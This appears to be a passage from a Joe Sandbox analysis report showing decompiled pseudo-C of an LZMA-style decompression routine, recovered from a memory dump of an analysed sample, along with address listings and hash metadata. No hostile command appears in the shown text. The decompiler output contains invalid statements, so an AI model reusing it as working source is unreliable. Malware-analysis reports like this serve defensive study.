                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          													__ebx = __ebx | 0x00000001;
                                                          													__eflags = __ebx;
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													L102:
                                                          													_t339 = __ebp - 0x48;
                                                          													 *_t339 =  *(__ebp - 0x48) - 1;
                                                          													__eflags =  *_t339;
                                                          													goto L103;
                                                          												} else {
                                                          													goto L100;
                                                          												}
                                                          											}
                                                          											__edx =  *(__ebp - 4);
                                                          											__eax = __eax - __ebx;
                                                          											 *(__ebp - 0x40) = __ecx;
                                                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                          											goto L109;
                                                          										case 0x1a:
                                                          											L56:
                                                          											__eflags =  *(__ebp - 0x64);
                                                          											if( *(__ebp - 0x64) == 0) {
                                                          												 *(__ebp - 0x88) = 0x1a;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x68);
                                                          											__al =  *(__ebp - 0x5c);
                                                          											__edx =  *(__ebp - 8);
                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          											 *( *(__ebp - 0x68)) = __al;
                                                          											__ecx =  *(__ebp - 0x14);
                                                          											 *(__ecx +  *(__ebp - 8)) = __al;
                                                          											__eax = __ecx + 1;
                                                          											__edx = 0;
                                                          											_t192 = __eax %  *(__ebp - 0x74);
                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                          											__edx = _t192;
                                                          											goto L80;
                                                          										case 0x1b:
                                                          											L76:
                                                          											__eflags =  *(__ebp - 0x64);
                                                          											if( *(__ebp - 0x64) == 0) {
                                                          												 *(__ebp - 0x88) = 0x1b;
                                                          												goto L170;
                                                          											}
                                                          											__eax =  *(__ebp - 0x14);
                                                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          											__eflags = __eax -  *(__ebp - 0x74);
                                                          											if(__eax >=  *(__ebp - 0x74)) {
                                                          												__eax = __eax +  *(__ebp - 0x74);
                                                          												__eflags = __eax;
                                                          											}
                                                          											__edx =  *(__ebp - 8);
                                                          											__cl =  *(__eax + __edx);
                                                          											__eax =  *(__ebp - 0x14);
                                                          											 *(__ebp - 0x5c) = __cl;
                                                          											 *(__eax + __edx) = __cl;
                                                          											__eax = __eax + 1;
                                                          											__edx = 0;
                                                          											_t275 = __eax %  *(__ebp - 0x74);
                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                          											__edx = _t275;
                                                          											__eax =  *(__ebp - 0x68);
                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          											_t284 = __ebp - 0x64;
                                                          											 *_t284 =  *(__ebp - 0x64) - 1;
                                                          											__eflags =  *_t284;
                                                          											 *( *(__ebp - 0x68)) = __cl;
                                                          											L80:
                                                          											 *(__ebp - 0x14) = __edx;
                                                          											goto L81;
                                                          										case 0x1c:
                                                          											while(1) {
                                                          												L124:
                                                          												__eflags =  *(__ebp - 0x64);
                                                          												if( *(__ebp - 0x64) == 0) {
                                                          													break;
                                                          												}
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__edx =  *(__ebp - 8);
                                                          												__cl =  *(__eax + __edx);
                                                          												__eax =  *(__ebp - 0x14);
                                                          												 *(__ebp - 0x5c) = __cl;
                                                          												 *(__eax + __edx) = __cl;
                                                          												__eax = __eax + 1;
                                                          												__edx = 0;
                                                          												_t415 = __eax %  *(__ebp - 0x74);
                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                          												__edx = _t415;
                                                          												__eax =  *(__ebp - 0x68);
                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                          												__eflags =  *(__ebp - 0x30);
                                                          												 *( *(__ebp - 0x68)) = __cl;
                                                          												 *(__ebp - 0x14) = _t415;
                                                          												if( *(__ebp - 0x30) > 0) {
                                                          													continue;
                                                          												} else {
                                                          													L81:
                                                          													 *(__ebp - 0x88) = 2;
                                                          													goto L1;
                                                          												}
                                                          											}
                                                          											 *(__ebp - 0x88) = 0x1c;
                                                          											L170:
                                                          											_push(0x22);
                                                          											_pop(_t567);
                                                          											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                          											_t535 = 0;
                                                          											L172:
                                                          											return _t535;
                                                          									}
                                                          								}
                                                          								L171:
                                                          								_t535 = _t534 | 0xffffffff;
                                                          								goto L172;
                                                          							}
                                                          						}
                                                          						__eax =  *(__ebp - 0x50);
                                                          						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          						__eax =  *(__ebp - 0x58);
                                                          						__esi = __edx + __eax;
                                                          						 *(__ebp - 0x54) = __esi;
                                                          						__ax =  *__esi;
                                                          						__edi = __ax & 0x0000ffff;
                                                          						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          						if( *(__ebp - 0xc) >= __ecx) {
                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          							__cx = __ax;
                                                          							__cx = __ax >> 5;
                                                          							__eax = __eax - __ecx;
                                                          							__edx = __edx + 1;
                                                          							 *__esi = __ax;
                                                          							 *(__ebp - 0x50) = __edx;
                                                          						} else {
                                                          							 *(__ebp - 0x10) = __ecx;
                                                          							0x800 = 0x800 - __edi;
                                                          							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          							 *__esi = __cx;
                                                          						}
                                                          						if( *(__ebp - 0x10) >= 0x1000000) {
                                                          							goto L148;
                                                          						} else {
                                                          							goto L146;
                                                          						}
                                                          					}
                                                          					goto L1;
                                                          				}
                                                          			}








                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406740
                                                          0x00406744
                                                          0x004068f3
                                                          0x00000000
                                                          0x004068f3
                                                          0x00406750
                                                          0x00406757
                                                          0x0040675f
                                                          0x00406762
                                                          0x00406765
                                                          0x00406765
                                                          0x00000000
                                                          0x00000000
                                                          0x00406083
                                                          0x00406085
                                                          0x00406088
                                                          0x004060f9
                                                          0x004060fc
                                                          0x004060ff
                                                          0x00406106
                                                          0x00406110
                                                          0x00000000
                                                          0x00406110
                                                          0x0040608a
                                                          0x0040608e
                                                          0x00406091
                                                          0x00406093
                                                          0x00406096
                                                          0x00406099
                                                          0x0040609b
                                                          0x0040609e
                                                          0x004060a0
                                                          0x004060a5
                                                          0x004060a8
                                                          0x004060ab
                                                          0x004060af
                                                          0x004060b6
                                                          0x004060b9
                                                          0x004060c0
                                                          0x004060c4
                                                          0x004060cc
                                                          0x004060cc
                                                          0x004060cc
                                                          0x004060c6
                                                          0x004060c6
                                                          0x004060c6
                                                          0x004060bb
                                                          0x004060bb
                                                          0x004060bb
                                                          0x004060d0
                                                          0x004060d3
                                                          0x004060f1
                                                          0x004060f3
                                                          0x00000000
                                                          0x004060d5
                                                          0x004060d5
                                                          0x004060d8
                                                          0x004060db
                                                          0x004060de
                                                          0x004060e0
                                                          0x004060e0
                                                          0x004060e0
                                                          0x004060e3
                                                          0x004060e6
                                                          0x004060e8
                                                          0x004060e9
                                                          0x004060ec
                                                          0x00000000
                                                          0x004060ec
                                                          0x00000000
                                                          0x00406322
                                                          0x00406326
                                                          0x00406344
                                                          0x00406347
                                                          0x0040634e
                                                          0x00406351
                                                          0x00406354
                                                          0x00406357
                                                          0x0040635a
                                                          0x0040635d
                                                          0x0040635f
                                                          0x00406366
                                                          0x00406367
                                                          0x00406369
                                                          0x0040636c
                                                          0x0040636f
                                                          0x00406372
                                                          0x00406372
                                                          0x00406377
                                                          0x00000000
                                                          0x00406377
                                                          0x00406328
                                                          0x0040632b
                                                          0x0040632e
                                                          0x00406338
                                                          0x00000000
                                                          0x00000000
                                                          0x0040638c
                                                          0x00406390
                                                          0x004063b3
                                                          0x004063b6
                                                          0x004063b9
                                                          0x004063c3
                                                          0x00406392
                                                          0x00406392
                                                          0x00406395
                                                          0x00406398
                                                          0x0040639b
                                                          0x004063a8
                                                          0x004063ab
                                                          0x004063ab
                                                          0x00000000
                                                          0x00000000
                                                          0x004063cf
                                                          0x004063d3
                                                          0x00000000
                                                          0x00000000
                                                          0x004063d9
                                                          0x004063dd
                                                          0x00000000
                                                          0x00000000
                                                          0x004063e3
                                                          0x004063e5
                                                          0x004063e9
                                                          0x004063e9
                                                          0x004063ec
                                                          0x004063f0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406440
                                                          0x00406444
                                                          0x0040644b
                                                          0x0040644e
                                                          0x00406451
                                                          0x0040645b
                                                          0x00000000
                                                          0x0040645b
                                                          0x00406446
                                                          0x00000000
                                                          0x00000000
                                                          0x00406467
                                                          0x0040646b
                                                          0x00406472
                                                          0x00406475
                                                          0x00406478
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040647b
                                                          0x0040647e
                                                          0x00406481
                                                          0x00406481
                                                          0x00406484
                                                          0x00406487
                                                          0x0040648a
                                                          0x0040648a
                                                          0x0040648d
                                                          0x00406494
                                                          0x00406499
                                                          0x00000000
                                                          0x00000000
                                                          0x00406527
                                                          0x00406527
                                                          0x0040652b
                                                          0x004068c9
                                                          0x00000000
                                                          0x004068c9
                                                          0x00406531
                                                          0x00406534
                                                          0x00406537
                                                          0x0040653b
                                                          0x0040653e
                                                          0x00406544
                                                          0x00406546
                                                          0x00406546
                                                          0x00406546
                                                          0x00406549
                                                          0x0040654c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040611c
                                                          0x0040611c
                                                          0x00406120
                                                          0x0040688d
                                                          0x00000000
                                                          0x0040688d
                                                          0x00406126
                                                          0x00406129
                                                          0x0040612c
                                                          0x00406130
                                                          0x00406133
                                                          0x00406139
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613e
                                                          0x00406141
                                                          0x00406141
                                                          0x00406144
                                                          0x00406147
                                                          0x00000000
                                                          0x00000000
                                                          0x0040614d
                                                          0x00406153
                                                          0x00000000
                                                          0x00000000
                                                          0x00406159
                                                          0x00406159
                                                          0x0040615d
                                                          0x00406160
                                                          0x00406163
                                                          0x00406166
                                                          0x00406169
                                                          0x0040616a
                                                          0x0040616d
                                                          0x0040616f
                                                          0x00406175
                                                          0x00406178
                                                          0x0040617b
                                                          0x0040617e
                                                          0x00406181
                                                          0x00406184
                                                          0x00406187
                                                          0x004061a3
                                                          0x004061a6
                                                          0x004061a9
                                                          0x004061ac
                                                          0x004061b3
                                                          0x004061b7
                                                          0x004061b9
                                                          0x004061bd
                                                          0x00406189
                                                          0x00406189
                                                          0x0040618d
                                                          0x00406195
                                                          0x0040619a
                                                          0x0040619c
                                                          0x0040619e
                                                          0x0040619e
                                                          0x004061c0
                                                          0x004061c7
                                                          0x004061ca
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d5
                                                          0x004061d5
                                                          0x004061d9
                                                          0x00406899
                                                          0x00000000
                                                          0x00406899
                                                          0x004061df
                                                          0x004061e2
                                                          0x004061e5
                                                          0x004061e9
                                                          0x004061ec
                                                          0x004061f2
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f7
                                                          0x004061fa
                                                          0x004061fa
                                                          0x004061fa
                                                          0x00406200
                                                          0x00000000
                                                          0x00000000
                                                          0x00406202
                                                          0x00406205
                                                          0x00406208
                                                          0x0040620b
                                                          0x0040620e
                                                          0x00406211
                                                          0x00406214
                                                          0x00406217
                                                          0x0040621a
                                                          0x0040621d
                                                          0x00406220
                                                          0x00406238
                                                          0x0040623b
                                                          0x0040623e
                                                          0x00406241
                                                          0x00406241
                                                          0x00406244
                                                          0x00406248
                                                          0x0040624a
                                                          0x00406222
                                                          0x00406222
                                                          0x0040622a
                                                          0x0040622f
                                                          0x00406231
                                                          0x00406233
                                                          0x00406233
                                                          0x0040624d
                                                          0x00406254
                                                          0x00406257
                                                          0x00000000
                                                          0x00406259
                                                          0x00000000
                                                          0x00406259
                                                          0x00406257
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406299
                                                          0x00406299
                                                          0x0040629d
                                                          0x004068a5
                                                          0x00000000
                                                          0x004068a5
                                                          0x004062a3
                                                          0x004062a6
                                                          0x004062a9
                                                          0x004062ad
                                                          0x004062b0
                                                          0x004062b6
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062bb
                                                          0x004062be
                                                          0x004062be
                                                          0x004062c4
                                                          0x00406262
                                                          0x00406262
                                                          0x00406265
                                                          0x00000000
                                                          0x00406265
                                                          0x004062c6
                                                          0x004062c6
                                                          0x004062c9
                                                          0x004062cc
                                                          0x004062cf
                                                          0x004062d2
                                                          0x004062d5
                                                          0x004062d8
                                                          0x004062db
                                                          0x004062de
                                                          0x004062e1
                                                          0x004062e4
                                                          0x004062fc
                                                          0x004062ff
                                                          0x00406302
                                                          0x00406305
                                                          0x00406305
                                                          0x00406308
                                                          0x0040630c
                                                          0x0040630e
                                                          0x004062e6
                                                          0x004062e6
                                                          0x004062ee
                                                          0x004062f3
                                                          0x004062f5
                                                          0x004062f7
                                                          0x004062f7
                                                          0x00406311
                                                          0x00406318
                                                          0x0040631b
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x004065aa
                                                          0x004065aa
                                                          0x004065ae
                                                          0x004068d5
                                                          0x00000000
                                                          0x004068d5
                                                          0x004065b4
                                                          0x004065b7
                                                          0x004065ba
                                                          0x004065be
                                                          0x004065c1
                                                          0x004065c7
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040637a
                                                          0x0040637a
                                                          0x0040637d
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406776
                                                          0x0040677a
                                                          0x00406798
                                                          0x00406798
                                                          0x00406798
                                                          0x0040679f
                                                          0x004067a6

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c3c742c09450cbd9cdceaab41d3d05724668c311a364285e3bc9e665de74165
                                                          • Instruction ID: d4317c89d1632f45c632c26a697e2fc4357ac15b25f122c790db5755eb07ebec
                                                          • Opcode Fuzzy Hash: 6c3c742c09450cbd9cdceaab41d3d05724668c311a364285e3bc9e665de74165
                                                          • Instruction Fuzzy Hash: 83913171D00229CBDF28CF98C854BADBBB1FB44309F15816AD856BB281C7789A96DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E004063CF() {
                                                          				unsigned short _t532;
                                                          				signed int _t533;
                                                          				void _t534;
                                                          				void* _t535;
                                                          				signed int _t536;
                                                          				signed int _t565;
                                                          				signed int _t568;
                                                          				signed int _t589;
                                                          				signed int* _t606;
                                                          				void* _t613;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t613 - 0x40) != 0) {
                                                          						L89:
                                                          						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                          						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                          						L69:
                                                          						_t606 =  *(_t613 - 0x58);
                                                          						 *(_t613 - 0x84) = 0x12;
                                                          						L132:
                                                          						 *(_t613 - 0x54) = _t606;
                                                          						L133:
                                                          						_t532 =  *_t606;
                                                          						_t589 = _t532 & 0x0000ffff;
                                                          						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                          						if( *(_t613 - 0xc) >= _t565) {
                                                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                          							 *(_t613 - 0x40) = 1;
                                                          							_t533 = _t532 - (_t532 >> 5);
                                                          							 *_t606 = _t533;
                                                          						} else {
                                                          							 *(_t613 - 0x10) = _t565;
                                                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                          						}
                                                          						if( *(_t613 - 0x10) >= 0x1000000) {
                                                          							L139:
                                                          							_t534 =  *(_t613 - 0x84);
                                                          							L140:
                                                          							 *(_t613 - 0x88) = _t534;
                                                          							goto L1;
                                                          						} else {
                                                          							L137:
                                                          							if( *(_t613 - 0x6c) == 0) {
                                                          								 *(_t613 - 0x88) = 5;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          							goto L139;
                                                          						}
                                                          					} else {
                                                          						if( *(__ebp - 0x60) == 0) {
                                                          							L171:
                                                          							_t536 = _t535 | 0xffffffff;
                                                          							L172:
                                                          							return _t536;
                                                          						}
                                                          						__eax = 0;
                                                          						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                          						0 | _t258 = _t258 + _t258 + 9;
                                                          						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                          						L75:
                                                          						if( *(__ebp - 0x64) == 0) {
                                                          							 *(__ebp - 0x88) = 0x1b;
                                                          							L170:
                                                          							_t568 = 0x22;
                                                          							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                          							_t536 = 0;
                                                          							goto L172;
                                                          						}
                                                          						__eax =  *(__ebp - 0x14);
                                                          						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          						if(__eax >=  *(__ebp - 0x74)) {
                                                          							__eax = __eax +  *(__ebp - 0x74);
                                                          						}
                                                          						__edx =  *(__ebp - 8);
                                                          						__cl =  *(__eax + __edx);
                                                          						__eax =  *(__ebp - 0x14);
                                                          						 *(__ebp - 0x5c) = __cl;
                                                          						 *(__eax + __edx) = __cl;
                                                          						__eax = __eax + 1;
                                                          						__edx = 0;
                                                          						_t274 = __eax %  *(__ebp - 0x74);
                                                          						__eax = __eax /  *(__ebp - 0x74);
                                                          						__edx = _t274;
                                                          						__eax =  *(__ebp - 0x68);
                                                          						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          						_t283 = __ebp - 0x64;
                                                          						 *_t283 =  *(__ebp - 0x64) - 1;
                                                          						 *( *(__ebp - 0x68)) = __cl;
                                                          						L79:
                                                          						 *(__ebp - 0x14) = __edx;
                                                          						L80:
                                                          						 *(__ebp - 0x88) = 2;
                                                          					}
                                                          					L1:
                                                          					_t535 =  *(_t613 - 0x88);
                                                          					if(_t535 > 0x1c) {
                                                          						goto L171;
                                                          					}
                                                          					switch( *((intOrPtr*)(_t535 * 4 +  &M00406926))) {
                                                          						case 0:
                                                          							if( *(_t613 - 0x6c) == 0) {
                                                          								goto L170;
                                                          							}
                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          							_t535 =  *( *(_t613 - 0x70));
                                                          							if(_t535 > 0xe1) {
                                                          								goto L171;
                                                          							}
                                                          							_t539 = _t535 & 0x000000ff;
                                                          							_push(0x2d);
                                                          							asm("cdq");
                                                          							_pop(_t570);
                                                          							_push(9);
                                                          							_pop(_t571);
                                                          							_t609 = _t539 / _t570;
                                                          							_t541 = _t539 % _t570 & 0x000000ff;
                                                          							asm("cdq");
                                                          							_t604 = _t541 % _t571 & 0x000000ff;
                                                          							 *(_t613 - 0x3c) = _t604;
                                                          							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                          							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                          							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                          							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                          								L10:
                                                          								if(_t612 == 0) {
                                                          									L12:
                                                          									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          									goto L15;
                                                          								} else {
                                                          									goto L11;
                                                          								}
                                                          								do {
                                                          									L11:
                                                          									_t612 = _t612 - 1;
                                                          									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                          								} while (_t612 != 0);
                                                          								goto L12;
                                                          							}
                                                          							if( *(_t613 - 4) != 0) {
                                                          								GlobalFree( *(_t613 - 4));
                                                          							}
                                                          							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                          							 *(_t613 - 4) = _t535;
                                                          							if(_t535 == 0) {
                                                          								goto L171;
                                                          							} else {
                                                          								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                          								goto L10;
                                                          							}
                                                          						case 1:
                                                          							L13:
                                                          							__eflags =  *(_t613 - 0x6c);
                                                          							if( *(_t613 - 0x6c) == 0) {
                                                          								 *(_t613 - 0x88) = 1;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          							_t45 = _t613 - 0x48;
                                                          							 *_t45 =  *(_t613 - 0x48) + 1;
                                                          							__eflags =  *_t45;
                                                          							L15:
                                                          							if( *(_t613 - 0x48) < 4) {
                                                          								goto L13;
                                                          							}
                                                          							_t547 =  *(_t613 - 0x40);
                                                          							if(_t547 ==  *(_t613 - 0x74)) {
                                                          								L20:
                                                          								 *(_t613 - 0x48) = 5;
                                                          								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                          								goto L23;
                                                          							}
                                                          							 *(_t613 - 0x74) = _t547;
                                                          							if( *(_t613 - 8) != 0) {
                                                          								GlobalFree( *(_t613 - 8));
                                                          							}
                                                          							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                          							 *(_t613 - 8) = _t535;
                                                          							if(_t535 == 0) {
                                                          								goto L171;
                                                          							} else {
                                                          								goto L20;
                                                          							}
                                                          						case 2:
                                                          							L24:
                                                          							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                          							 *(_t613 - 0x84) = 6;
                                                          							 *(_t613 - 0x4c) = _t554;
                                                          							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                          							goto L132;
                                                          						case 3:
                                                          							L21:
                                                          							__eflags =  *(_t613 - 0x6c);
                                                          							if( *(_t613 - 0x6c) == 0) {
                                                          								 *(_t613 - 0x88) = 3;
                                                          								goto L170;
                                                          							}
                                                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          							_t67 = _t613 - 0x70;
                                                          							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                          							__eflags =  *_t67;
                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          							L23:
                                                          							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                          							if( *(_t613 - 0x48) != 0) {
                                                          								goto L21;
                                                          							}
                                                          							goto L24;
                                                          						case 4:
                                                          							goto L133;
                                                          						case 5:
                                                          							goto L137;
                                                          						case 6:
                                                          							__edx = 0;
                                                          							__eflags =  *(__ebp - 0x40);
                                                          							if( *(__ebp - 0x40) != 0) {
                                                          								__eax =  *(__ebp - 4);
                                                          								__ecx =  *(__ebp - 0x38);
                                                          								 *(__ebp - 0x34) = 1;
                                                          								 *(__ebp - 0x84) = 7;
                                                          								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          								goto L132;
                                                          							}
                                                          							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          							__esi =  *(__ebp - 0x60);
                                                          							__cl = 8;
                                                          							__cl = 8 -  *(__ebp - 0x3c);
                                                          							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          							__ecx =  *(__ebp - 0x3c);
                                                          							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          							__ecx =  *(__ebp - 4);
                                                          							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          							__eflags =  *(__ebp - 0x38) - 4;
                                                          							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          							if( *(__ebp - 0x38) >= 4) {
                                                          								__eflags =  *(__ebp - 0x38) - 0xa;
                                                          								if( *(__ebp - 0x38) >= 0xa) {
                                                          									_t98 = __ebp - 0x38;
                                                          									 *_t98 =  *(__ebp - 0x38) - 6;
                                                          									__eflags =  *_t98;
                                                          								} else {
                                                          									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          								}
                                                          							} else {
                                                          								 *(__ebp - 0x38) = 0;
                                                          							}
                                                          							__eflags =  *(__ebp - 0x34) - __edx;
                                                          							if( *(__ebp - 0x34) == __edx) {
                                                          								__ebx = 0;
                                                          								__ebx = 1;
                                                          								goto L61;
                                                          							} else {
                                                          								__eax =  *(__ebp - 0x14);
                                                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          								__eflags = __eax -  *(__ebp - 0x74);
                                                          								if(__eax >=  *(__ebp - 0x74)) {
                                                          									__eax = __eax +  *(__ebp - 0x74);
                                                          									__eflags = __eax;
                                                          								}
                                                          								__ecx =  *(__ebp - 8);
                                                          								__ebx = 0;
                                                          								__ebx = 1;
                                                          								__al =  *((intOrPtr*)(__eax + __ecx));
                                                          								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          								goto L41;
                                                          							}
                                                          						case 7:
                                                          							__eflags =  *(__ebp - 0x40) - 1;
                                                          							if( *(__ebp - 0x40) != 1) {
                                                          								__eax =  *(__ebp - 0x24);
                                                          								 *(__ebp - 0x80) = 0x16;
                                                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          								__eax =  *(__ebp - 0x28);
